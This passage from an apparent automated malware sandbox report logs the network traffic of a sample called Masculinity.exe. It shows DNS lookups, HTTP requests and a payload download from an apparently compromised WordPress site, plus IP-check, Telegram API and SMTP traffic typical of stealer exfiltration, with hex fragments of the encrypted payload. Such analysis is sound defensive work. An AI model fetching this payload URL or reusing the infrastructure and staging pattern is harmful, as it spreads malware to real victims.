Jul 25, 2024 10:06:12.238972902 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:12.610163927 CEST	587	49734	66.29.159.53	192.168.2.5
Jul 25, 2024 10:06:12.655905962 CEST	49734	587	192.168.2.5	66.29.159.53

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 10:05:09.730678082 CEST	56100	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:05:09.982188940 CEST	53	56100	1.1.1.1	192.168.2.5
Jul 25, 2024 10:05:12.441382885 CEST	56316	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:05:12.449825048 CEST	53	56316	1.1.1.1	192.168.2.5
Jul 25, 2024 10:05:21.737171888 CEST	52535	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:05:21.748289108 CEST	53	52535	1.1.1.1	192.168.2.5
Jul 25, 2024 10:06:02.144911051 CEST	52554	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:06:02.157700062 CEST	53	52554	1.1.1.1	192.168.2.5
Jul 25, 2024 10:06:09.119333982 CEST	61906	53	192.168.2.5	1.1.1.1
Jul 25, 2024 10:06:09.129265070 CEST	53	61906	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 25, 2024 10:05:09.730678082 CEST	192.168.2.5	1.1.1.1	0x1fb2	Standard query (0)	www.reap.skyestates.com.mt	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:05:12.441382885 CEST	192.168.2.5	1.1.1.1	0x28e8	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:05:21.737171888 CEST	192.168.2.5	1.1.1.1	0x45b5	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:06:02.144911051 CEST	192.168.2.5	1.1.1.1	0x70b0	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:06:09.119333982 CEST	192.168.2.5	1.1.1.1	0xac78	Standard query (0)	smtp.privateemail.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 25, 2024 10:05:09.982188940 CEST	1.1.1.1	192.168.2.5	0x1fb2	No error (0)	www.reap.skyestates.com.mt		108.167.181.251	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:05:12.449825048 CEST	1.1.1.1	192.168.2.5	0x28e8	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 25, 2024 10:05:12.449825048 CEST	1.1.1.1	192.168.2.5	0x28e8	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:05:12.449825048 CEST	1.1.1.1	192.168.2.5	0x28e8	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:05:12.449825048 CEST	1.1.1.1	192.168.2.5	0x28e8	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:05:12.449825048 CEST	1.1.1.1	192.168.2.5	0x28e8	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:05:12.449825048 CEST	1.1.1.1	192.168.2.5	0x28e8	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:05:21.748289108 CEST	1.1.1.1	192.168.2.5	0x45b5	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:05:21.748289108 CEST	1.1.1.1	192.168.2.5	0x45b5	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:06:02.157700062 CEST	1.1.1.1	192.168.2.5	0x70b0	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jul 25, 2024 10:06:09.129265070 CEST	1.1.1.1	192.168.2.5	0xac78	No error (0)	smtp.privateemail.com		66.29.159.53	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.reap.skyestates.com.mt

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49716	193.122.6.168	80	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:05:12.465281010 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:05:20.347295046 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:20 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 20f8223d378a7f1a76a0949749c0e092 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:05:20.350888968 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:05:21.518094063 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:21 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cf93e2e900d6d34eeac164aa293f81d5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Jul 25, 2024 10:05:22.442203999 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:05:23.832575083 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:23 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c7ffd49f44eba9452671805c5dbfe56b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49719	193.122.6.168	80	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:05:24.478636026 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jul 25, 2024 10:05:32.717781067 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:32 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a1d14bac7f0688485bddcee630e1df93 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49722	193.122.6.168	80	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:05:33.376296997 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:05:45.499855995 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:45 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7ed9eedac0f08763d02dcb54518132c5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49724	193.122.6.168	80	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:05:46.120785952 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:05:52.240860939 CEST	730	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 25 Jul 2024 08:05:51 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 639a76874d0553b65c92ce7dcb30c7f9 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Jul 25, 2024 10:05:52.241206884 CEST	730	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 25 Jul 2024 08:05:51 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: 639a76874d0553b65c92ce7dcb30c7f9 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49725	193.122.6.168	80	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:05:52.266782045 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:05:53.057436943 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:52 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: bd62b77f23f098cff753640559bd4878 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49727	193.122.6.168	80	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:05:53.761452913 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:05:56.685353994 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:56 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 70e12ccb296f43d0e6e375e7e731eedb Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49729	193.122.6.168	80	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:05:57.390372038 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:05:59.175483942 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:59 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d87d8b7b6f71a8c63880d83b2c6b7142 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49731	193.122.6.168	80	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:05:59.821676970 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:06:01.481292009 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:06:01 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ca7fc6f5e3e37980df66808404c6885b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49715	108.167.181.251	443	528	C:\Users\user\AppData\Local\Temp\Masculinity.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:05:10 UTC	196	OUT	GET /wp-includes/MGGxuAN14.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.reap.skyestates.com.mt Cache-Control: no-cache
2024-07-25 08:05:10 UTC	249	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:05:10 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 23 Jul 2024 21:19:45 GMT Accept-Ranges: bytes Content-Length: 277056 Content-Type: application/octet-stream
2024-07-25 08:05:10 UTC	7943	IN	Data Raw: c0 6b e5 25 68 6b f0 92 64 4c 17 10 eb 7b fc e6 64 9a 0c 89 f4 6e 9f 26 80 d9 0c ab 11 a2 42 28 5a ef 01 f3 2b da be 39 f8 97 38 95 48 c5 c6 f1 99 75 49 8b 04 de 76 2f 4a bf 4d f1 27 2c f6 a6 2a 3e 69 e2 63 58 6e 82 58 67 60 ab bc 81 ad 53 23 cf 70 b8 45 d1 01 25 2d 39 0c a4 d3 ec 26 d8 6e 0e eb c4 bb e7 f7 9d b1 09 f2 2b 04 f3 79 d2 c3 7b ff cb ee f5 1c 67 69 98 22 57 f3 7e d3 36 5e 68 90 4a 62 d6 ee 74 62 3c 1a 40 4c fe d8 47 be 12 24 d0 f8 42 ee b2 b1 21 46 7d 2a a8 cc 7e ef 06 0f 7f a2 4d 9e 8d de 6d 23 28 90 80 33 44 03 e0 02 3e 7a 56 53 27 a5 a6 1e 79 9a cc 33 33 71 d7 24 2e ba 5a 8f 51 60 c2 d6 b8 2d ce 5d 5a 38 61 ea fa 55 89 98 bd db c2 77 c8 6f d3 25 8c 90 81 17 17 97 69 d7 f2 2b 53 da f4 42 cf 2b e9 bc 3c 1d c8 83 98 a6 87 3c 67 ad 7e c9 a2 04 Data Ascii: k%hkdL{dn&B(Z+98HuIv/JM',>icXnXg`S#pE%-9&n+y{gi"W~6^hJbtb<@LG$B!F}~Mm#(3D>zVS'y33q$.ZQ`-]Z8aUwo%i+SB+<<g~
2024-07-25 08:05:10 UTC	8000	IN	Data Raw: 6a 92 3c 93 6e 0a c9 47 88 35 99 a5 5d a2 9e f7 d6 4c dd 59 7d 27 25 1f 90 1a f6 81 da 60 3e ac 9a fe 82 d4 b7 e6 6f 47 0e e6 95 b7 4f ed 64 35 f2 9b 43 5d 87 47 7d 2e 2c d3 cd 24 3e ac 1d 2b 24 b9 5c 48 33 e5 fd d2 bb 2d 4c 82 80 77 9f f2 87 ee df e4 da 8c c8 a3 87 58 14 f8 d1 74 21 ea a2 19 1f b1 cb 77 05 f0 aa 91 4a 38 19 7f 8b 03 90 1b 63 a7 6a 25 ed bc 0d 79 2c 99 03 3a 48 4d ea 46 c9 57 5f 3e 55 b5 7c 9c 0f 9f da f9 eb 3d 90 2f 50 f7 52 b9 47 81 85 b5 2f a6 6f 1e 06 15 63 3e 59 d6 1a 4f 5a 1d 46 1b 36 2b 41 59 15 3d 33 54 f9 25 82 0d 8d 93 68 69 7d d5 24 bd 7d 19 4c 52 fd 01 01 8d 3c 8b 2c 72 f2 95 90 85 a0 78 9b 32 5a 85 76 f9 cb 1f c5 05 d5 8c bf a0 59 81 f8 a8 51 8d f9 4a 1a bc 34 8f 42 f2 93 3c 67 85 53 ca 15 ec c2 c1 08 51 ec 81 70 41 c6 e5 da Data Ascii: j<nG5]LY}'%`>oGOd5C]G}.,$>+$\H3-LwXt!wJ8cj%y,:HMFW_>U\|=/PRG/oc>YOZF6+AY=3T%hi}$}LR<,rx2ZvYQJ4B<gSQpA
2024-07-25 08:05:10 UTC	8000	IN	Data Raw: e8 be 30 6b 97 1d 2a 40 d1 93 ef dc 25 52 1f af a3 e3 7e 17 4b 6b a2 5a 67 34 05 4d 43 6a ad b8 61 3e 8f 1f 3c 25 3b e4 58 37 4b 6a 4b 36 d3 df 42 22 e4 04 fc 12 09 83 c2 70 55 d3 a2 ca e8 9f e3 c3 fe 22 97 8b e6 33 59 ab 4d 4a ae 50 eb f8 b6 f0 63 e8 8a 43 4f de fa 9c 49 09 f7 91 8e 68 66 44 91 a9 a8 46 31 c0 35 e1 3c d1 aa 26 52 da d6 70 67 62 79 ff 60 58 6a f0 f4 72 60 db 3d 65 ad 53 9f a0 c9 b8 45 d7 29 86 6d 39 06 8c ba ec 26 de 6e 0e eb b6 77 f2 f7 ed b2 66 43 2b 04 f5 51 71 c3 7b f5 e3 87 f5 1c 61 69 b2 22 44 43 7c d3 05 50 77 2a 60 62 62 f6 b9 3d e6 1b 0c 85 f3 8b 51 b5 61 04 a4 a1 3b f7 a1 d0 4c 62 e0 4d 01 a2 11 9d 55 9c 1a 82 35 ce 63 9c 04 4d 0c a7 3d 60 64 64 85 60 34 a7 5b 5e 27 81 8c 1e 6a aa c8 33 64 21 92 24 31 f6 5b 9d 51 a4 ca 06 de 2d Data Ascii: 0k@%R~KkZg4MCja><%;X7KjK6B"pU"3YMJPcCOIhfDF15<&Rpgby`Xjr`=eSE)m9&nwfC+Qq{ai"DC\|Pw`bb=Qa;LbMU5cM=`dd`4[^'j3d!$1[Q-
2024-07-25 08:05:10 UTC	8000	IN	Data Raw: 0d bd 35 93 b2 25 f5 88 fd 8e 38 f5 d8 77 f9 2f 0f 44 1a f9 93 cb 70 07 cb 98 cf 1a c9 2d a6 6f 47 0f c3 83 c4 1d 49 d0 45 42 fb 54 75 32 5c 4d 2e 8e 3e d5 56 18 bd 1d 5b 97 9c 45 45 a6 e5 fd dc 12 7a 74 fe bb 04 b7 d4 25 cb c2 b2 b9 8c c8 ad e4 23 00 8a bf d8 04 86 c7 74 09 b1 bb d4 08 93 a2 33 65 38 0f 15 a9 14 1d 9f 11 6d 7b 00 8b bd b9 dd 3f 9f 1e 04 18 4c f9 58 fe 52 60 fe c4 98 7e a1 2d f8 df ef 7b 15 8b 2f 5c fd 5e 96 42 33 8b bf 5f d8 d3 36 d2 1f 6e 46 10 c2 68 e3 59 19 3f 0a ab 2b 41 57 74 d8 08 4c 98 33 f8 94 58 93 62 17 11 c3 56 48 7e 11 2d 72 c4 b3 01 87 25 8f 39 65 91 a7 f8 36 d0 17 47 21 53 9e 7f fc 4a c1 d2 1e c3 ef c5 fc 59 80 de b6 58 9b 9b 2d 5a ad 35 90 2c 25 93 36 6d 59 53 d9 0e 2a 5e 8d 4a 0a 34 81 7a 58 cc f4 d9 6f 88 f0 4c 71 2b b9 Data Ascii: 5%8w/Dp-oGIEBTu2\M.>V[EEzt%#t3e8m{?LXR`~-{/\^B3_6nFhY?+AWtL3XbVH~-r%9e6G!SJYX-Z5,%6mYS*^J4zXoLq+
2024-07-25 08:05:10 UTC	8000	IN	Data Raw: 40 d6 ec 50 dc 25 1d 12 a6 aa f5 76 99 22 96 f9 5a 67 8e 05 44 2c 82 ab b8 6b 2e 51 13 3c 69 17 e3 50 58 4a 6a 4b 31 d4 03 9c 17 c1 2c c8 21 0e 89 d1 64 55 fb c0 8f e8 95 3f 81 c8 21 97 d4 e6 33 27 9e 4d 4a bb 22 c2 e7 b6 80 71 be 10 43 4f d0 83 db 48 1a f4 96 a3 d0 c2 46 9b bf 28 6a 3b c6 1d b9 73 c8 aa 56 40 9d ee 70 67 6e ef 1c 61 4b 68 93 5a 5e 50 aa 43 7e ad 47 65 c9 4d b8 45 d7 72 e5 6d 39 06 8c 12 ec 26 d2 6e 7d 29 c4 bb ed e4 9a a0 0e 8c 11 04 f3 7d a1 00 7b ff c1 81 31 1c 67 63 98 33 50 1c bb d3 36 5a 09 17 44 62 66 88 7f 43 84 11 0c 90 d8 fe 1d c7 61 74 88 3e 2d 89 ca a2 04 76 1e 3b ee f9 11 9b 2c 02 dd 82 3f e1 e3 ef 03 50 85 94 cf 60 65 4b 99 14 93 4f 5b 2e 8f a4 b1 36 cd 9a cc 39 91 04 8a 56 08 f9 5b fc f3 9c 5e 38 e6 2d ce 59 f8 1d 7b 98 c1 Data Ascii: @P%v"ZgD,k.Q<iPXJjK1,!dU?!3'MJ"qCOHF(j;sV@pgnaKhZ^PC~GeMErm9&n})}{1gc3P6ZDbfCat>-v;,?P`eKO[.69V[^8-Y{
